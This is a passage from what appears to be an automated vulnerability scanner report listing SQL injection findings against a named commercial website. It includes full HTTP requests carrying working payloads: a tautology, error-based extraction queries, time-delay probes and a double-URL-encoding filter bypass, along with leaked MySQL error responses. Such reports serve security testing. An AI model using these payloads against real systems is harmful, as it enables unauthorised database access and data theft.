HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7230 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The OAVARS[a08b960a] cookie appears to be vulnerable to SQL injection attacks. The payload 17315712'%20or%201%3d1--%20 was submitted in the OAVARS[a08b960a] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D17315712'%20or%201%3d1--%20; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7230 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The OAVARS[a750dce4] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a750dce4] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D' Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7230 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the PHPSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783%2527; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j3ih87sif6judm1aru5v4f9ha7; path=/ Content-Length: 7230 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j23oasevfq3jc4cljp2d0nv165; path=/ Content-Length: 4094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jlvolfqgp3g1na6sd6min3s2o1; path=/ Content-Length: 3917 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6rc7aqfvqu347ckivrtbsh1j31; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc=iupsc&address=';WAITFOR DELAY '0:0:25'--&attributeId_342_g=20' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /ppc/leadflow/hins00%2527/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i9l2mh22h1nbb5vf9aihuo1su7; path=/ Content-Length: 7334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00'/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002 OR X='ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accoun' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pet0n1djhopedelhfegtv8ov40; path=/ Content-Length: 4094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=muofe0klnh4u7un92a6tdbr1j2; path=/ Content-Length: 3917 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:33 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lme8knucmuhqu6p31tp9d5jdc3; path=/ Content-Length: 4094 Connection: close Content-Type: text/html; charset=UTF-8
